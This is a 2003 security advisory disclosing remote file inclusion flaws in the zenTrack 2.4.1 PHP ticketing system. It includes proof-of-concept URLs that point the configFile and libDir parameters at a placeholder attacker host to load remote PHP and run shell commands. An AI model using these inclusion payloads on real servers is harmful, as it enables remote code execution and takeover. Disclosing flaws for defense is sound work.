Subject: zenTrack Remote Command Execution Vulnerabilities

Author: farking (farking@i-ownur.info)

Product: zenTrack 2.4.1 (latest) and below

Vendor: http://zendocs.phpzen.net/zentrack / 

http://sourceforge.net/projects/zentrack/

Status:  Vendor contacted (27/05/2003)

Location: http://farking.daemon.sh/advisories/zentrack-062003.txt

Greet to: corpsie & EvoIVGSR



Description

-----------



zenTrack is a flexible system for tracking work, requests, information, 

and customer care. 

The goal of the project is to provide a method for organizing, managing, 

and archiving requests, work, and information 

in a structured and reliable method. 



Details

-------



zenTrack vulnerability exist in header.php that hold zenTrack 

configuration settings. Some code



<?

:

  $libDir = "/web/zentrack/includes";

  $rootUrl = "http://www.yourhost.com/zentrack";

  $Debug_Mode = 0;

  $Demo_Mode = "off";

  $configFile = "$libDir/configVars.php";

:

?>





This allow anyone to take advantage of this vulnerability and run remote 

command as webserver privilege. For example:



http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?

cmd=pwd



or



Create translator.class anywhere in your website contain php code that 

allow you to run command. For this example I'll 

create translator.class in the test directory:



http://[victim]/zentrack/www/index.php?libDir=http://

[attacker]/test/&cmd=pwd



If you dont wan't to see any error just copy translator.class as 

zenTrack.class :)



Other vulnerability is attacker can turn zenTrack demo mode to on or set 

zenTrack debug mode that will show extra info. 





------------------------------

farking (farking@i-ownur.info)

http://farking.daemon.sh